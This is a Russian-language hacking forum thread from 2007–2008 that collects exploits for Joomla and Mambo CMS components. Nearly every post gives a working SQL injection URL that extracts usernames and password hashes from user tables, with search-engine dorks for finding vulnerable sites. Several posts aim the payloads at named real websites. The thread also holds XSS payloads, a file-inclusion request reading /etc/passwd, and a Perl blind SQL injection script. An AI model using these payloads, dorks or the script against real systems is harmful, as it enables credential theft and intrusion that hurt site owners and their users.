Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    Joomla Component rapidrecipe <= 1.6.5 SQL Injection

    SQL Injection

    Code:
    after user_id or catogry_id add exploit
    
    -9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    Для поиска:

    Code:
    allinurl: "com_rapidrecipe"user_id
    allinurl: "com_rapidrecipe" category_id

    Joomla Component pcchess <= 0.8 Remote SQL Injection

    SQL Injection

    Code:
    index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    Для поиска:

    Code:
    allinurl: com_pcchess "user_id"
    allinurl: com_pcchess
    (c)
     
    4 people like this.
  2. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Нашел сам, проверил - вроде не боян
    Limbo - Lite Mambo 1.0.4
    SQL инъекция в модуле downloads, в параметре catid, сайты тех поддержки уязвимы:
    Code:
    http://limbo-cms.com.ru/index.php?option=downloads&catid=2700+union+select+1,concat_ws(0x3a,username,password),3+from+lc_users+--+
    Code:
    http://limboportal.com/index.php?option=downloads&catid=7%20and%20substring(version(),1,1)=3+--+
     
    5 people like this.
  3. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component Blog Calendar 1.2.4 Passiv XSS

    inurl: index.php?option=com_blog_calendar
    Инъекция:
    Code:
    index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.coockie);%22%3E123%3C!--
    http://courier.brestnet.com/index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.coockie);%22%3E123%3C!--
    Для того что бы выскочил алерт нужно навести курсор на бажную ссылку.

    Component Board [версия неизвестна] Local Include

    inurl: index.php?option=com_board
    Инъекция:
    Code:
    index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=
    http://eng.pharmaceutical.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
    По поводу компонента Board, не уверен правильно ли уязвимость назвал, но юзается на ура =)

    (c) it's my
     
    #43 it's my, 13 Feb 2008
    Last edited: 13 Feb 2008
  4. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability​


    Code:
    index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*
    (c)milw0rm.com
     
    #44 FraiDex, 14 Feb 2008
    Last edited: 14 Feb 2008
  5. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    Joomla Component paxxgallery 0.2 (iid) SQL Injection

    Exploit

    Code:
    AFTER userid ADD EXPLİOT(USERİD DEN SONRA EXPLOİT EKLE)
    
    EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOİT
    
    EXPLOIT==
    
    S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users
    Для поиска

    Code:
    allinurl: com_paxxgallery "iid"
    allinurl: com_paxxgallery "userid"

    Joomla Component MCQuiz 0.9 Final (tid) SQL Injection

    Exploit

    Code:
    ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE
    
    EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]
    
    EXPLOIT=1=
    
    1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*
    
    EXPLOİT=2=
    
    1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
    Для поиска

    Code:
    allinurl: com_mcquiz "tid"
    allinurl: com_mcquiz

    Joomla Component Quiz <= 0.81 (tid) SQL Injection

    Exploit

    Code:
    ALL PASSWORD AND USERNAME UNDER PAGE
    
    EXAMPLE: AFTER tid add EXPLOİTS
    
    www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT]
    
    EXPLOIT=1=
    
    1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*
    
    EXPLOİT=2=
    
    1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
    Для поиска

    Code:
    allinurl: com_quiz"tid"
    allinurl: com_quiz
    (c)


    Joomla Component mediaslide (albumnum) Blind SQL Injection

    Code:
    #!/usr/bin/perl
    #inphex
    #joomla com_mediaslide blind sql injection
    use LWP::UserAgent;
    use LWP::Simple;
    use Switch;
    use Digest::MD5 qw(md5 md5_hex md5_base64);
    print "usage: $0 -h host.com -p /\n";
    ### use Getopt::Long; ###
    $column = "username";
    $table = "jos_users";
    $regex = "preview_f2";
    %cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-r" => "regex");
    $a = 0;
    foreach  (@ARGV) {
    	$a++;
    	while (($k, $v) = each(%cm_n_)) {
    		if ($_ eq $k) {
    			${$v} = $ARGV[$a];
    		}
    	}
    }
    
    $i = 48;
    $h = 1;
    $f = 0;
    $k = 0;
    ### Yeah,that's it... ###
    while () {
        while ($i <= 90) {
    		
    	    if(check($i,$h,1) == 1)
    	    {
    	    	syswrite STDOUT,lc(chr($i));
    	    	$h++;
    			$a_chr = $a_chr.chr($i);
    	    } 
    		
    		$i++;
    		
    	} 
    	push(@ffs,length($a_chr)); 
    	if (($#ffs -1) == $ffs) {
    		&check_vuln();
    		exit;
    	}
    	$i = 48;
    	
    }
    #/
    
    ### :D ###
    sub check($$$)
    {
    	$i = shift;
    	$h = shift;
    	$m = shift;
    
    	switch ($m)
    	{
    		case 1 { $query = "%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$h.",1)=CHAR(".$i.")"; }
    	}
    
    	$ua = LWP::UserAgent->new;
    	$url = "http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
    	$response = $ua->get($url);
    	$content = $response->content;
    	if($content =~ /$regex/) { return 0;} else { return 1 ;}
    }
    #/
    
    sub check_vuln
    {
    	
    
    	$content = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
    	$content1 = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");
    
    	foreach $bb1 (split(/\n/,$content)) {
    		$bb = $bb.$bb1;
    	}
    
    	foreach  $yy1 (split(/\n/,$content1)) {
    		$yy = $yy.$yy1;
    	}
    
    	$f =  md5_hex($bb);
    	$s = md5_hex($yy);
    
    	if ($f eq $s) {
    		print "\nprobably not vulnerable";    #could be that ads,texts etc.. change
    		exit;
    	} else { print "\nvulnerable..."; }
    }
    
    # milw0rm.com [2008-02-14]
     
    4 people like this.
  6. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

    Mambo
    Code:
    /index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
    Joomla
    Code:
    /index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
    allinurl:"com_quran"
    inurl:"/index.php?option=com_quran"


    (c)milw0rm.com
     
    #46 FraiDex, 15 Feb 2008
    Last edited: 15 Feb 2008
    1 person likes this.
  7. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    392
    Likes Received:
    247
    Reputations:
    88
    Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability

    EXPLOIT
    зы
    Auth S@BUN http://milw0rm.com/exploits/5133
     
  8. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    392
    Likes Received:
    247
    Reputations:
    88
    joomla SQL Injection(com_jooget)


    EXPLOIT :
    зы

    Auth S@BUN http://milw0rm.com/exploits/5132
     
  9. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component Portfolio 1.0 SQL Injection

    inurl: index.php?option=com_portfolio
    Инъекция:
    Code:
    index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*
    http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password  ),5,6,7,8,9,10,11,12+from+mos_users/*
    (с) it's my http://milw0rm.com/exploits/5139

    Joomla Component Artist

    Code:
    http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
    http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
    http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
    Три разных уязвимых параметра
     
    #49 it's my, 19 Feb 2008
    Last edited: 19 Feb 2008
  10. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    Joomla Component com_pccookbook (user_id) SQL Injection

    SQL Injection

    Code:
    index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    Для поиска

    Code:
    allinurl: com_pccookbook
    allinurl: viewuserrecipes
    allinurl: "com_pccookbook"user_id

    Joomla Component com_clasifier (cat_id) SQL Injection

    SQL Injection

    Code:
    index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
    Для поиска

    Code:
    allinurl: com_clasifier
    allinurl: com_clasifier cat_id
    (c)
     
    2 people like this.
  11. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Кoмпoнeнт соm_рhilаfоrm

    уязвимый параметр fоrm_id

    но работает не везде,в чем причина не разобрался

    пример уязвимого сайта:

    код:

    httр://www.nехtрrоm.ru/index.рhр?орtiоn=соm_рhilаfоrm&Itеmid=5&fоrm_id=1+uniоn+sеlесt+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36#&Itemid=5
     
    #51 sasTO, 20 Feb 2008
    Last edited: 25 Feb 2008
    3 people like this.
  12. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component EasyBook 1.1 Active XSS

    inurl: index.php?option=com_easybook
    Инъекция:
    Code:
    При добавлении сообщения уязвимо поле "Ваш сайт:/Your Homepage:". вписываем: http://www.com/" onmouseover=javascript:alert(/XSS/);> и добавляем сообщение.
    Пример: http://demo.easy-joomla.org/index.php?option=com_easybook&amp;Itemid=5
    Никнейм Hi!, наводим курсор на ссылку
     
    3 people like this.
  13. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Component Simpleboard 1.0.3 (catid) SQL Injection

    inurl: index.php?option=com_simpleboard
    Инъекция:
    Code:
    index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
    http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
    (c) it's my, Scipio, xcedz http://milw0rm.com/exploits/5195
     
    3 people like this.
  14. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Mambo Component com_Musica (id) Remote SQL Injection Vulnerability

    SQL Injection

    Code:
    index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*

    milw0rm
     
  15. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability

    SQL Injection


    Joomla!

    Code:
    /index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--
    
    Mambo

    Code:
    /index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--
    

    milw0rm
     
  16. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability

    SQL Injection

    Code:
    index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
    
    milw0rm
     
    1 person likes this.
  17. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Joomla 1.5.1

    Active XSS

    Edit Your Details -> Your Name: [XSS]

    XSS
    (Права администратора)
    Active:
    Article: [ New ] -> Title: [XSS]
    Passive:
    Filter:[XSS]
    Code:
    /administrator/index.php?option=com_menus&task=view&menutype=[COLOR=Red][XSS][/COLOR]
    ZAMUT (c)
     
    #57 Roba, 15 Mar 2008
    Last edited: 15 Mar 2008
    4 people like this.
  18. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    638
    Likes Received:
    520
    Reputations:
    19
    Joomla components com_guide "category" Remote SQL Injection

    PoC:
    Code:
    index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,
    password,3,4,5,6,7,8/**/from/**/jos_users/*
    
    © The-0utl4w
     
  19. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability

    SQL Injection

    index.php?option=com_datsogallery&func=detail&id='Sql

    Code:
    union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
    milw0rm
     
    1 person likes this.
  20. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability

    SQL Injection

    http://[target]/index.php?option=com_myalbum&album=[SQL]

    Code:
    -1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

    Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability

    SQL Injection

    Code:
    index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
    
    DORK:

    inurl: "com_alphacontent"
    "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"


    milw0rm
     
    #60 ~!DoK_tOR!~, 28 Mar 2008
    Last edited: 28 Mar 2008
Loading...